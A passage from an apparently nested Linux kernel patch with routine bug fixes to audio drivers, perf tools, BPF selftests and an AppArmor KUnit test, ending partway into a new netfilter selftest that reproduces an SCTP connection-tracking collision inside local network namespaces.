+ 	KUNIT_EXPECT_PTR_EQ(test, puf->e->pos,
+@@ -538,7 +541,7 @@ static void policy_unpack_test_unpack_u64_out_of_bounds(struct kunit *test)
+ static void policy_unpack_test_unpack_X_code_match(struct kunit *test)
+ {
+ 	struct policy_unpack_fixture *puf = test->priv;
+-	bool success = unpack_X(puf->e, AA_NAME);
++	bool success = aa_unpack_X(puf->e, AA_NAME);
+ 
+ 	KUNIT_EXPECT_TRUE(test, success);
+ 	KUNIT_EXPECT_TRUE(test, puf->e->pos == puf->e->start + 1);
+@@ -547,7 +550,7 @@ static void policy_unpack_test_unpack_X_code_match(struct kunit *test)
+ static void policy_unpack_test_unpack_X_code_mismatch(struct kunit *test)
+ {
+ 	struct policy_unpack_fixture *puf = test->priv;
+-	bool success = unpack_X(puf->e, AA_STRING);
++	bool success = aa_unpack_X(puf->e, AA_STRING);
+ 
+ 	KUNIT_EXPECT_FALSE(test, success);
+ 	KUNIT_EXPECT_TRUE(test, puf->e->pos == puf->e->start);
+@@ -559,7 +562,7 @@ static void policy_unpack_test_unpack_X_out_of_bounds(struct kunit *test)
+ 	bool success;
+ 
+ 	puf->e->pos = puf->e->end;
+-	success = unpack_X(puf->e, AA_NAME);
++	success = aa_unpack_X(puf->e, AA_NAME);
+ 
+ 	KUNIT_EXPECT_FALSE(test, success);
+ }
+@@ -605,3 +608,5 @@ static struct kunit_suite apparmor_policy_unpack_test_module = {
+ };
+ 
+ kunit_test_suite(apparmor_policy_unpack_test_module);
++
++MODULE_LICENSE("GPL");
+diff --git a/sound/pci/hda/cs35l41_hda.c b/sound/pci/hda/cs35l41_hda.c
+index a5b10a6a33a5e..c79a12e5c9ad2 100644
+--- a/sound/pci/hda/cs35l41_hda.c
++++ b/sound/pci/hda/cs35l41_hda.c
+@@ -1501,8 +1501,7 @@ int cs35l41_hda_probe(struct device *dev, const char *device_name, int id, int i
+ 	ret = component_add(cs35l41->dev, &cs35l41_hda_comp_ops);
+ 	if (ret) {
+ 		dev_err(cs35l41->dev, "Register component failed: %d\n", ret);
+-		pm_runtime_disable(cs35l41->dev);
+-		goto err;
++		goto err_pm;
+ 	}
+ 
+ 	dev_info(cs35l41->dev, "Cirrus Logic CS35L41 (%x), Revision: %02X\n", regid, reg_revid);
+@@ -1510,6 +1509,7 @@ int cs35l41_hda_probe(struct device *dev, const char *device_name, int id, int i
+ 	return 0;
+ 
+ err_pm:
++	pm_runtime_dont_use_autosuspend(cs35l41->dev);
+ 	pm_runtime_disable(cs35l41->dev);
+ 	pm_runtime_put_noidle(cs35l41->dev);
+ 
+@@ -1528,6 +1528,7 @@ void cs35l41_hda_remove(struct device *dev)
+ 	struct cs35l41_hda *cs35l41 = dev_get_drvdata(dev);
+ 
+ 	pm_runtime_get_sync(cs35l41->dev);
++	pm_runtime_dont_use_autosuspend(cs35l41->dev);
+ 	pm_runtime_disable(cs35l41->dev);
+ 
+ 	if (cs35l41->halo_initialized)
+diff --git a/sound/soc/codecs/cs35l41.c b/sound/soc/codecs/cs35l41.c
+index 2f4b0ee93aced..e91c1a4640e46 100644
+--- a/sound/soc/codecs/cs35l41.c
++++ b/sound/soc/codecs/cs35l41.c
+@@ -374,10 +374,18 @@ static irqreturn_t cs35l41_irq(int irq, void *data)
+ 	struct cs35l41_private *cs35l41 = data;
+ 	unsigned int status[4] = { 0, 0, 0, 0 };
+ 	unsigned int masks[4] = { 0, 0, 0, 0 };
+-	int ret = IRQ_NONE;
+ 	unsigned int i;
++	int ret;
+ 
+-	pm_runtime_get_sync(cs35l41->dev);
++	ret = pm_runtime_resume_and_get(cs35l41->dev);
++	if (ret < 0) {
++		dev_err(cs35l41->dev,
++			"pm_runtime_resume_and_get failed in %s: %d\n",
++			__func__, ret);
++		return IRQ_NONE;
++	}
++
++	ret = IRQ_NONE;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(status); i++) {
+ 		regmap_read(cs35l41->regmap,
+@@ -1330,6 +1338,7 @@ int cs35l41_probe(struct cs35l41_private *cs35l41, const struct cs35l41_hw_cfg *
+ 	return 0;
+ 
+ err_pm:
++	pm_runtime_dont_use_autosuspend(cs35l41->dev);
+ 	pm_runtime_disable(cs35l41->dev);
+ 	pm_runtime_put_noidle(cs35l41->dev);
+ 
+@@ -1346,6 +1355,7 @@ EXPORT_SYMBOL_GPL(cs35l41_probe);
+ void cs35l41_remove(struct cs35l41_private *cs35l41)
+ {
+ 	pm_runtime_get_sync(cs35l41->dev);
++	pm_runtime_dont_use_autosuspend(cs35l41->dev);
+ 	pm_runtime_disable(cs35l41->dev);
+ 
+ 	regmap_write(cs35l41->regmap, CS35L41_IRQ1_MASK1, 0xFFFFFFFF);
+diff --git a/sound/soc/codecs/hdmi-codec.c b/sound/soc/codecs/hdmi-codec.c
+index 0b1cdb2d60498..4d3c3365488a2 100644
+--- a/sound/soc/codecs/hdmi-codec.c
++++ b/sound/soc/codecs/hdmi-codec.c
+@@ -861,18 +861,13 @@ static int hdmi_codec_set_jack(struct snd_soc_component *component,
+ 			       void *data)
+ {
+ 	struct hdmi_codec_priv *hcp = snd_soc_component_get_drvdata(component);
+-	int ret = -ENOTSUPP;
+ 
+ 	if (hcp->hcd.ops->hook_plugged_cb) {
+ 		hcp->jack = jack;
+-		ret = hcp->hcd.ops->hook_plugged_cb(component->dev->parent,
+-						    hcp->hcd.data,
+-						    plugged_cb,
+-						    component->dev);
+-		if (ret)
+-			hcp->jack = NULL;
++		return 0;
+ 	}
+-	return ret;
++
++	return -ENOTSUPP;
+ }
+ 
+ static int hdmi_dai_spdif_probe(struct snd_soc_dai *dai)
+@@ -948,6 +943,21 @@ static int hdmi_of_xlate_dai_id(struct snd_soc_component *component,
+ 	return ret;
+ }
+ 
++static int hdmi_probe(struct snd_soc_component *component)
++{
++	struct hdmi_codec_priv *hcp = snd_soc_component_get_drvdata(component);
++	int ret = 0;
++
++	if (hcp->hcd.ops->hook_plugged_cb) {
++		ret = hcp->hcd.ops->hook_plugged_cb(component->dev->parent,
++						    hcp->hcd.data,
++						    plugged_cb,
++						    component->dev);
++	}
++
++	return ret;
++}
++
+ static void hdmi_remove(struct snd_soc_component *component)
+ {
+ 	struct hdmi_codec_priv *hcp = snd_soc_component_get_drvdata(component);
+@@ -958,6 +968,7 @@ static void hdmi_remove(struct snd_soc_component *component)
+ }
+ 
+ static const struct snd_soc_component_driver hdmi_driver = {
++	.probe			= hdmi_probe,
+ 	.remove			= hdmi_remove,
+ 	.dapm_widgets		= hdmi_widgets,
+ 	.num_dapm_widgets	= ARRAY_SIZE(hdmi_widgets),
+diff --git a/sound/soc/fsl/fsl_easrc.c b/sound/soc/fsl/fsl_easrc.c
+index 3153d19136b29..84e6f9eb784dc 100644
+--- a/sound/soc/fsl/fsl_easrc.c
++++ b/sound/soc/fsl/fsl_easrc.c
+@@ -1966,17 +1966,21 @@ static int fsl_easrc_probe(struct platform_device *pdev)
+ 					      &fsl_easrc_dai, 1);
+ 	if (ret) {
+ 		dev_err(dev, "failed to register ASoC DAI\n");
+-		return ret;
++		goto err_pm_disable;
+ 	}
+ 
+ 	ret = devm_snd_soc_register_component(dev, &fsl_asrc_component,
+ 					      NULL, 0);
+ 	if (ret) {
+ 		dev_err(&pdev->dev, "failed to register ASoC platform\n");
+-		return ret;
++		goto err_pm_disable;
+ 	}
+ 
+ 	return 0;
++
++err_pm_disable:
++	pm_runtime_disable(&pdev->dev);
++	return ret;
+ }
+ 
+ static int fsl_easrc_remove(struct platform_device *pdev)
+diff --git a/sound/soc/fsl/mpc5200_dma.c b/sound/soc/fsl/mpc5200_dma.c
+index 9014978100207..3f7ccae3f6b1a 100644
+--- a/sound/soc/fsl/mpc5200_dma.c
++++ b/sound/soc/fsl/mpc5200_dma.c
+@@ -100,6 +100,9 @@ static irqreturn_t psc_dma_bcom_irq(int irq, void *_psc_dma_stream)
+ 
+ /**
+  * psc_dma_trigger: start and stop the DMA transfer.
++ * @component: triggered component
++ * @substream: triggered substream
++ * @cmd: triggered command
+  *
+  * This function is called by ALSA to start, stop, pause, and resume the DMA
+  * transfer of data.
+diff --git a/sound/soc/intel/skylake/skl-sst-utils.c b/sound/soc/intel/skylake/skl-sst-utils.c
+index 57ea815d3f041..b776c58dcf47a 100644
+--- a/sound/soc/intel/skylake/skl-sst-utils.c
++++ b/sound/soc/intel/skylake/skl-sst-utils.c
+@@ -299,6 +299,7 @@ int snd_skl_parse_uuids(struct sst_dsp *ctx, const struct firmware *fw,
+ 		module->instance_id = devm_kzalloc(ctx->dev, size, GFP_KERNEL);
+ 		if (!module->instance_id) {
+ 			ret = -ENOMEM;
++			kfree(module);
+ 			goto free_uuid_list;
+ 		}
+ 
+diff --git a/sound/soc/mediatek/mt8186/mt8186-mt6366-rt1019-rt5682s.c b/sound/soc/mediatek/mt8186/mt8186-mt6366-rt1019-rt5682s.c
+index 6babadb2e6fe2..f76bae1d81a09 100644
+--- a/sound/soc/mediatek/mt8186/mt8186-mt6366-rt1019-rt5682s.c
++++ b/sound/soc/mediatek/mt8186/mt8186-mt6366-rt1019-rt5682s.c
+@@ -1080,7 +1080,7 @@ static int mt8186_mt6366_rt1019_rt5682s_dev_probe(struct platform_device *pdev)
+ 	playback_codec = of_get_child_by_name(pdev->dev.of_node, "playback-codecs");
+ 	if (!playback_codec) {
+ 		ret = -EINVAL;
+-		dev_err_probe(&pdev->dev, ret, "Property 'speaker-codecs' missing or invalid\n");
++		dev_err_probe(&pdev->dev, ret, "Property 'playback-codecs' missing or invalid\n");
+ 		goto err_playback_codec;
+ 	}
+ 
+@@ -1094,7 +1094,7 @@ static int mt8186_mt6366_rt1019_rt5682s_dev_probe(struct platform_device *pdev)
+ 	for_each_card_prelinks(card, i, dai_link) {
+ 		ret = mt8186_mt6366_card_set_be_link(card, dai_link, playback_codec, "I2S3");
+ 		if (ret) {
+-			dev_err_probe(&pdev->dev, ret, "%s set speaker_codec fail\n",
++			dev_err_probe(&pdev->dev, ret, "%s set playback_codec fail\n",
+ 				      dai_link->name);
+ 			goto err_probe;
+ 		}
+diff --git a/sound/soc/soc-dapm.c b/sound/soc/soc-dapm.c
+index 879cf1be67a9f..6eb8c6cb5e673 100644
+--- a/sound/soc/soc-dapm.c
++++ b/sound/soc/soc-dapm.c
+@@ -3670,7 +3670,7 @@ snd_soc_dapm_new_control_unlocked(struct snd_soc_dapm_context *dapm,
+ 		dapm_pinctrl_event(w, NULL, SND_SOC_DAPM_POST_PMD);
+ 		break;
+ 	case snd_soc_dapm_clock_supply:
+-		w->clk = devm_clk_get(dapm->dev, w->name);
++		w->clk = devm_clk_get(dapm->dev, widget->name);
+ 		if (IS_ERR(w->clk)) {
+ 			ret = PTR_ERR(w->clk);
+ 			goto request_failed;
+diff --git a/sound/soc/sof/core.c b/sound/soc/sof/core.c
+index eaa16755a2704..93e1c38392a32 100644
+--- a/sound/soc/sof/core.c
++++ b/sound/soc/sof/core.c
+@@ -434,9 +434,10 @@ int snd_sof_device_remove(struct device *dev)
+ 	struct snd_sof_dev *sdev = dev_get_drvdata(dev);
+ 	struct snd_sof_pdata *pdata = sdev->pdata;
+ 	int ret;
++	bool aborted = false;
+ 
+ 	if (IS_ENABLED(CONFIG_SND_SOC_SOF_PROBE_WORK_QUEUE))
+-		cancel_work_sync(&sdev->probe_work);
++		aborted = cancel_work_sync(&sdev->probe_work);
+ 
+ 	/*
+ 	 * Unregister any registered client device first before IPC and debugfs
+@@ -462,6 +463,9 @@ int snd_sof_device_remove(struct device *dev)
+ 		snd_sof_free_debug(sdev);
+ 		snd_sof_remove(sdev);
+ 		sof_ops_free(sdev);
++	} else if (aborted) {
++		/* probe_work never ran */
++		sof_ops_free(sdev);
+ 	}
+ 
+ 	/* release firmware */
+diff --git a/sound/soc/ti/ams-delta.c b/sound/soc/ti/ams-delta.c
+index 438e2fa843a03..1acc4505aa9a9 100644
+--- a/sound/soc/ti/ams-delta.c
++++ b/sound/soc/ti/ams-delta.c
+@@ -303,7 +303,7 @@ static int cx81801_open(struct tty_struct *tty)
+ static void cx81801_close(struct tty_struct *tty)
+ {
+ 	struct snd_soc_component *component = tty->disc_data;
+-	struct snd_soc_dapm_context *dapm = &component->card->dapm;
++	struct snd_soc_dapm_context *dapm;
+ 
+ 	del_timer_sync(&cx81801_timer);
+ 
+@@ -315,6 +315,8 @@ static void cx81801_close(struct tty_struct *tty)
+ 
+ 	v253_ops.close(tty);
+ 
++	dapm = &component->card->dapm;
++
+ 	/* Revert back to default audio input/output constellation */
+ 	snd_soc_dapm_mutex_lock(dapm);
+ 
+diff --git a/tools/iio/iio_generic_buffer.c b/tools/iio/iio_generic_buffer.c
+index 44bbf80f0cfdd..0d0a7a19d6f95 100644
+--- a/tools/iio/iio_generic_buffer.c
++++ b/tools/iio/iio_generic_buffer.c
+@@ -54,9 +54,12 @@ enum autochan {
+ static unsigned int size_from_channelarray(struct iio_channel_info *channels, int num_channels)
+ {
+ 	unsigned int bytes = 0;
+-	int i = 0;
++	int i = 0, max = 0;
++	unsigned int misalignment;
+ 
+ 	while (i < num_channels) {
++		if (channels[i].bytes > max)
++			max = channels[i].bytes;
+ 		if (bytes % channels[i].bytes == 0)
+ 			channels[i].location = bytes;
+ 		else
+@@ -66,6 +69,14 @@ static unsigned int size_from_channelarray(struct iio_channel_info *channels, in
+ 		bytes = channels[i].location + channels[i].bytes;
+ 		i++;
+ 	}
++	/*
++	 * We want the data in next sample to also be properly aligned so
++	 * we'll add padding at the end if needed. Adding padding only
++	 * works for channel data which size is 2^n bytes.
++	 */
++	misalignment = bytes % max;
++	if (misalignment)
++		bytes += max - misalignment;
+ 
+ 	return bytes;
+ }
+diff --git a/tools/objtool/objtool.c b/tools/objtool/objtool.c
+index a7ecc32e35125..cda649644e32d 100644
+--- a/tools/objtool/objtool.c
++++ b/tools/objtool/objtool.c
+@@ -146,7 +146,5 @@ int main(int argc, const char **argv)
+ 	exec_cmd_init("objtool", UNUSED, UNUSED, UNUSED);
+ 	pager_init(UNUSED);
+ 
+-	objtool_run(argc, argv);
+-
+-	return 0;
++	return objtool_run(argc, argv);
+ }
+diff --git a/tools/perf/Documentation/perf-kwork.txt b/tools/perf/Documentation/perf-kwork.txt
+index 3c36324712b6e..482d6c52e2edf 100644
+--- a/tools/perf/Documentation/perf-kwork.txt
++++ b/tools/perf/Documentation/perf-kwork.txt
+@@ -8,7 +8,7 @@ perf-kwork - Tool to trace/measure kernel work properties (latencies)
+ SYNOPSIS
+ --------
+ [verse]
+-'perf kwork' {record}
++'perf kwork' {record|report|latency|timehist}
+ 
+ DESCRIPTION
+ -----------
+diff --git a/tools/perf/builtin-kwork.c b/tools/perf/builtin-kwork.c
+index fb8c63656ad89..25cba0d61736c 100644
+--- a/tools/perf/builtin-kwork.c
++++ b/tools/perf/builtin-kwork.c
+@@ -399,12 +399,14 @@ static int work_push_atom(struct perf_kwork *kwork,
+ 
+ 	work = work_findnew(&class->work_root, &key, &kwork->cmp_id);
+ 	if (work == NULL) {
+-		free(atom);
++		atom_free(atom);
+ 		return -1;
+ 	}
+ 
+-	if (!profile_event_match(kwork, work, sample))
++	if (!profile_event_match(kwork, work, sample)) {
++		atom_free(atom);
+ 		return 0;
++	}
+ 
+ 	if (dst_type < KWORK_TRACE_MAX) {
+ 		dst_atom = list_last_entry_or_null(&work->atom_list[dst_type],
+@@ -1670,9 +1672,10 @@ int cmd_kwork(int argc, const char **argv)
+ 	static struct perf_kwork kwork = {
+ 		.class_list          = LIST_HEAD_INIT(kwork.class_list),
+ 		.tool = {
+-			.mmap    = perf_event__process_mmap,
+-			.mmap2   = perf_event__process_mmap2,
+-			.sample  = perf_kwork__process_tracepoint_sample,
++			.mmap		= perf_event__process_mmap,
++			.mmap2		= perf_event__process_mmap2,
++			.sample		= perf_kwork__process_tracepoint_sample,
++			.ordered_events = true,
+ 		},
+ 		.atom_page_list      = LIST_HEAD_INIT(kwork.atom_page_list),
+ 		.sort_list           = LIST_HEAD_INIT(kwork.sort_list),
+diff --git a/tools/perf/builtin-stat.c b/tools/perf/builtin-stat.c
+index a2c74a34e4a44..bdd8dd54fdb63 100644
+--- a/tools/perf/builtin-stat.c
++++ b/tools/perf/builtin-stat.c
+@@ -1444,7 +1444,7 @@ static int perf_stat_init_aggr_mode(void)
+ 	 * taking the highest cpu number to be the size of
+ 	 * the aggregation translate cpumap.
+ 	 */
+-	if (evsel_list->core.user_requested_cpus)
++	if (!perf_cpu_map__empty(evsel_list->core.user_requested_cpus))
+ 		nr = perf_cpu_map__max(evsel_list->core.user_requested_cpus).cpu;
+ 	else
+ 		nr = 0;
+diff --git a/tools/perf/util/bpf_off_cpu.c b/tools/perf/util/bpf_off_cpu.c
+index 01f70b8e705a8..21f4d9ba023d9 100644
+--- a/tools/perf/util/bpf_off_cpu.c
++++ b/tools/perf/util/bpf_off_cpu.c
+@@ -98,7 +98,7 @@ static void off_cpu_finish(void *arg __maybe_unused)
+ /* v5.18 kernel added prev_state arg, so it needs to check the signature */
+ static void check_sched_switch_args(void)
+ {
+-	const struct btf *btf = bpf_object__btf(skel->obj);
++	const struct btf *btf = btf__load_vmlinux_btf();
+ 	const struct btf_type *t1, *t2, *t3;
+ 	u32 type_id;
+ 
+@@ -116,7 +116,8 @@ static void check_sched_switch_args(void)
+ 		return;
+ 
+ 	t3 = btf__type_by_id(btf, t2->type);
+-	if (t3 && btf_is_func_proto(t3) && btf_vlen(t3) == 4) {
++	/* btf_trace func proto has one more argument for the context */
++	if (t3 && btf_is_func_proto(t3) && btf_vlen(t3) == 5) {
+ 		/* new format: pass prev_state as 4th arg */
+ 		skel->rodata->has_prev_state = true;
+ 	}
+diff --git a/tools/perf/util/hist.c b/tools/perf/util/hist.c
+index 17a05e943b44b..bffd058cbecee 100644
+--- a/tools/perf/util/hist.c
++++ b/tools/perf/util/hist.c
+@@ -2645,8 +2645,6 @@ void hist__account_cycles(struct branch_stack *bs, struct addr_location *al,
+ 
+ 	/* If we have branch cycles always annotate them. */
+ 	if (bs && bs->nr && entries[0].flags.cycles) {
+-		int i;
+-
+ 		bi = sample__resolve_bstack(sample, al);
+ 		if (bi) {
+ 			struct addr_map_symbol *prev = NULL;
+@@ -2661,7 +2659,7 @@ void hist__account_cycles(struct branch_stack *bs, struct addr_location *al,
+ 			 * Note that perf stores branches reversed from
+ 			 * program order!
+ 			 */
+-			for (i = bs->nr - 1; i >= 0; i--) {
++			for (int i = bs->nr - 1; i >= 0; i--) {
+ 				addr_map_symbol__account_cycles(&bi[i].from,
+ 					nonany_branch_mode ? NULL : prev,
+ 					bi[i].flags.cycles);
+@@ -2670,6 +2668,12 @@ void hist__account_cycles(struct branch_stack *bs, struct addr_location *al,
+ 				if (total_cycles)
+ 					*total_cycles += bi[i].flags.cycles;
+ 			}
++			for (unsigned int i = 0; i < bs->nr; i++) {
++				map__put(bi[i].to.ms.map);
++				maps__put(bi[i].to.ms.maps);
++				map__put(bi[i].from.ms.map);
++				maps__put(bi[i].from.ms.maps);
++			}
+ 			free(bi);
+ 		}
+ 	}
+diff --git a/tools/perf/util/machine.c b/tools/perf/util/machine.c
+index 76316e459c3de..9cd52f50ea7ac 100644
+--- a/tools/perf/util/machine.c
++++ b/tools/perf/util/machine.c
+@@ -2555,16 +2555,18 @@ static int lbr_callchain_add_lbr_ip(struct thread *thread,
+ 		save_lbr_cursor_node(thread, cursor, i);
+ 	}
+ 
+-	/* Add LBR ip from first entries.to */
+-	ip = entries[0].to;
+-	flags = &entries[0].flags;
+-	*branch_from = entries[0].from;
+-	err = add_callchain_ip(thread, cursor, parent,
+-			       root_al, &cpumode, ip,
+-			       true, flags, NULL,
+-			       *branch_from);
+-	if (err)
+-		return err;
++	if (lbr_nr > 0) {
++		/* Add LBR ip from first entries.to */
++		ip = entries[0].to;
++		flags = &entries[0].flags;
++		*branch_from = entries[0].from;
++		err = add_callchain_ip(thread, cursor, parent,
++				root_al, &cpumode, ip,
++				true, flags, NULL,
++				*branch_from);
++		if (err)
++			return err;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/tools/testing/selftests/bpf/prog_tests/tailcalls.c b/tools/testing/selftests/bpf/prog_tests/tailcalls.c
+index 58fe2c586ed76..09c189761926c 100644
+--- a/tools/testing/selftests/bpf/prog_tests/tailcalls.c
++++ b/tools/testing/selftests/bpf/prog_tests/tailcalls.c
+@@ -271,11 +271,11 @@ static void test_tailcall_count(const char *which)
+ 
+ 	data_map = bpf_object__find_map_by_name(obj, "tailcall.bss");
+ 	if (CHECK_FAIL(!data_map || !bpf_map__is_internal(data_map)))
+-		return;
++		goto out;
+ 
+ 	data_fd = bpf_map__fd(data_map);
+-	if (CHECK_FAIL(map_fd < 0))
+-		return;
++	if (CHECK_FAIL(data_fd < 0))
++		goto out;
+ 
+ 	i = 0;
+ 	err = bpf_map_lookup_elem(data_fd, &i, &val);
+@@ -352,11 +352,11 @@ static void test_tailcall_4(void)
+ 
+ 	data_map = bpf_object__find_map_by_name(obj, "tailcall.bss");
+ 	if (CHECK_FAIL(!data_map || !bpf_map__is_internal(data_map)))
+-		return;
++		goto out;
+ 
+ 	data_fd = bpf_map__fd(data_map);
+-	if (CHECK_FAIL(map_fd < 0))
+-		return;
++	if (CHECK_FAIL(data_fd < 0))
++		goto out;
+ 
+ 	for (i = 0; i < bpf_map__max_entries(prog_array); i++) {
+ 		snprintf(prog_name, sizeof(prog_name), "classifier_%d", i);
+@@ -442,11 +442,11 @@ static void test_tailcall_5(void)
+ 
+ 	data_map = bpf_object__find_map_by_name(obj, "tailcall.bss");
+ 	if (CHECK_FAIL(!data_map || !bpf_map__is_internal(data_map)))
+-		return;
++		goto out;
+ 
+ 	data_fd = bpf_map__fd(data_map);
+-	if (CHECK_FAIL(map_fd < 0))
+-		return;
++	if (CHECK_FAIL(data_fd < 0))
++		goto out;
+ 
+ 	for (i = 0; i < bpf_map__max_entries(prog_array); i++) {
+ 		snprintf(prog_name, sizeof(prog_name), "classifier_%d", i);
+@@ -631,11 +631,11 @@ static void test_tailcall_bpf2bpf_2(void)
+ 
+ 	data_map = bpf_object__find_map_by_name(obj, "tailcall.bss");
+ 	if (CHECK_FAIL(!data_map || !bpf_map__is_internal(data_map)))
+-		return;
++		goto out;
+ 
+ 	data_fd = bpf_map__fd(data_map);
+-	if (CHECK_FAIL(map_fd < 0))
+-		return;
++	if (CHECK_FAIL(data_fd < 0))
++		goto out;
+ 
+ 	i = 0;
+ 	err = bpf_map_lookup_elem(data_fd, &i, &val);
+@@ -805,11 +805,11 @@ static void test_tailcall_bpf2bpf_4(bool noise)
+ 
+ 	data_map = bpf_object__find_map_by_name(obj, "tailcall.bss");
+ 	if (CHECK_FAIL(!data_map || !bpf_map__is_internal(data_map)))
+-		return;
++		goto out;
+ 
+ 	data_fd = bpf_map__fd(data_map);
+-	if (CHECK_FAIL(map_fd < 0))
+-		return;
++	if (CHECK_FAIL(data_fd < 0))
++		goto out;
+ 
+ 	i = 0;
+ 	val.noise = noise;
+@@ -872,7 +872,7 @@ static void test_tailcall_bpf2bpf_6(void)
+ 	ASSERT_EQ(topts.retval, 0, "tailcall retval");
+ 
+ 	data_fd = bpf_map__fd(obj->maps.bss);
+-	if (!ASSERT_GE(map_fd, 0, "bss map fd"))
++	if (!ASSERT_GE(data_fd, 0, "bss map fd"))
+ 		goto out;
+ 
+ 	i = 0;
+diff --git a/tools/testing/selftests/net/pmtu.sh b/tools/testing/selftests/net/pmtu.sh
+index dfe3d287f01d2..0d705fdcf3b76 100755
+--- a/tools/testing/selftests/net/pmtu.sh
++++ b/tools/testing/selftests/net/pmtu.sh
+@@ -2013,7 +2013,7 @@ run_test() {
+ 	case $ret in
+ 		0)
+ 			all_skipped=false
+-			[ $exitcode=$ksft_skip ] && exitcode=0
++			[ $exitcode -eq $ksft_skip ] && exitcode=0
+ 		;;
+ 		$ksft_skip)
+ 			[ $all_skipped = true ] && exitcode=$ksft_skip
+diff --git a/tools/testing/selftests/netfilter/Makefile b/tools/testing/selftests/netfilter/Makefile
+index 321db8850da00..bced422b78f72 100644
+--- a/tools/testing/selftests/netfilter/Makefile
++++ b/tools/testing/selftests/netfilter/Makefile
+@@ -6,13 +6,14 @@ TEST_PROGS := nft_trans_stress.sh nft_fib.sh nft_nat.sh bridge_brouter.sh \
+ 	nft_concat_range.sh nft_conntrack_helper.sh \
+ 	nft_queue.sh nft_meta.sh nf_nat_edemux.sh \
+ 	ipip-conntrack-mtu.sh conntrack_tcp_unreplied.sh \
+-	conntrack_vrf.sh nft_synproxy.sh rpath.sh nft_audit.sh
++	conntrack_vrf.sh nft_synproxy.sh rpath.sh nft_audit.sh \
++	conntrack_sctp_collision.sh xt_string.sh
+ 
+ HOSTPKG_CONFIG := pkg-config
+ 
+ CFLAGS += $(shell $(HOSTPKG_CONFIG) --cflags libmnl 2>/dev/null)
+ LDLIBS += $(shell $(HOSTPKG_CONFIG) --libs libmnl 2>/dev/null || echo -lmnl)
+ 
+-TEST_GEN_FILES =  nf-queue connect_close audit_logread
++TEST_GEN_FILES =  nf-queue connect_close audit_logread sctp_collision
+ 
+ include ../lib.mk
+diff --git a/tools/testing/selftests/netfilter/conntrack_sctp_collision.sh b/tools/testing/selftests/netfilter/conntrack_sctp_collision.sh
+new file mode 100755
+index 0000000000000..a924e595cfd8b
+--- /dev/null
++++ b/tools/testing/selftests/netfilter/conntrack_sctp_collision.sh
+@@ -0,0 +1,89 @@
++#!/bin/bash
++# SPDX-License-Identifier: GPL-2.0
++#
++# Testing For SCTP COLLISION SCENARIO as Below:
++#
++#   14:35:47.655279 IP CLIENT_IP.PORT > SERVER_IP.PORT: sctp (1) [INIT] [init tag: 2017837359]
++#   14:35:48.353250 IP SERVER_IP.PORT > CLIENT_IP.PORT: sctp (1) [INIT] [init tag: 1187206187]
++#   14:35:48.353275 IP CLIENT_IP.PORT > SERVER_IP.PORT: sctp (1) [INIT ACK] [init tag: 2017837359]
++#   14:35:48.353283 IP SERVER_IP.PORT > CLIENT_IP.PORT: sctp (1) [COOKIE ECHO]
++#   14:35:48.353977 IP CLIENT_IP.PORT > SERVER_IP.PORT: sctp (1) [COOKIE ACK]
++#   14:35:48.855335 IP SERVER_IP.PORT > CLIENT_IP.PORT: sctp (1) [INIT ACK] [init tag: 164579970]
++#
++# TOPO: SERVER_NS (link0)<--->(link1) ROUTER_NS (link2)<--->(link3) CLIENT_NS
++
++CLIENT_NS=$(mktemp -u client-XXXXXXXX)
++CLIENT_IP="198.51.200.1"
++CLIENT_PORT=1234
++
++SERVER_NS=$(mktemp -u server-XXXXXXXX)
++SERVER_IP="198.51.100.1"
++SERVER_PORT=1234
++
++ROUTER_NS=$(mktemp -u router-XXXXXXXX)
++CLIENT_GW="198.51.200.2"
++SERVER_GW="198.51.100.2"
++
++# setup the topo
++setup() {
++	ip net add $CLIENT_NS
++	ip net add $SERVER_NS
++	ip net add $ROUTER_NS
++	ip -n $SERVER_NS link add link0 type veth peer name link1 netns $ROUTER_NS
++	ip -n $CLIENT_NS link add link3 type veth peer name link2 netns $ROUTER_NS
++
++	ip -n $SERVER_NS link set link0 up
++	ip -n $SERVER_NS addr add $SERVER_IP/24 dev link0
++	ip -n $SERVER_NS route add $CLIENT_IP dev link0 via $SERVER_GW
++
++	ip -n $ROUTER_NS link set link1 up
++	ip -n $ROUTER_NS link set link2 up
++	ip -n $ROUTER_NS addr add $SERVER_GW/24 dev link1
++	ip -n $ROUTER_NS addr add $CLIENT_GW/24 dev link2
++	ip net exec $ROUTER_NS sysctl -wq net.ipv4.ip_forward=1
++
++	ip -n $CLIENT_NS link set link3 up
++	ip -n $CLIENT_NS addr add $CLIENT_IP/24 dev link3
++	ip -n $CLIENT_NS route add $SERVER_IP dev link3 via $CLIENT_GW
++
++	# simulate the delay on OVS upcall by setting up a delay for INIT_ACK with
++	# tc on $SERVER_NS side
++	tc -n $SERVER_NS qdisc add dev link0 root handle 1: htb
++	tc -n $SERVER_NS class add dev link0 parent 1: classid 1:1 htb rate 100mbit
++	tc -n $SERVER_NS filter add dev link0 parent 1: protocol ip u32 match ip protocol 132 \
++		0xff match u8 2 0xff at 32 flowid 1:1
++	tc -n $SERVER_NS qdisc add dev link0 parent 1:1 handle 10: netem delay 1200ms
++
++	# simulate the ctstate check on OVS nf_conntrack
++	ip net exec $ROUTER_NS iptables -A FORWARD -m state --state INVALID,UNTRACKED -j DROP
++	ip net exec $ROUTER_NS iptables -A INPUT -p sctp -j DROP
++
++	# use a smaller number for assoc's max_retrans to reproduce the issue
++	modprobe sctp
++	ip net exec $CLIENT_NS sysctl -wq net.sctp.association_max_retrans=3
++}
++
++cleanup() {
++	ip net exec $CLIENT_NS pkill sctp_collision 2>&1 >/dev/null
++	ip net exec $SERVER_NS pkill sctp_collision 2>&1 >/dev/null
++	ip net del "$CLIENT_NS"
++	ip net del "$SERVER_NS"
++	ip net del "$ROUTER_NS"
++}
++
++do_test() {
++	ip net exec $SERVER_NS ./sctp_collision server \
++		$SERVER_IP $SERVER_PORT $CLIENT_IP $CLIENT_PORT &
++	ip net exec $CLIENT_NS ./sctp_collision client \
++		$CLIENT_IP $CLIENT_PORT $SERVER_IP $SERVER_PORT
++}
++
++# NOTE: one way to work around the issue is set a smaller hb_interval
++# ip net exec $CLIENT_NS sysctl -wq net.sctp.hb_interval=3500
++
++# run the test case
++trap cleanup EXIT
++setup && \
++echo "Test for SCTP Collision in nf_conntrack:" && \
++do_test && echo "PASS!"
++exit $?
+diff --git a/tools/testing/selftests/netfilter/sctp_collision.c b/tools/testing/selftests/netfilter/sctp_collision.c
+new file mode 100644
+index 0000000000000..21bb1cfd8a856
+--- /dev/null
++++ b/tools/testing/selftests/netfilter/sctp_collision.c
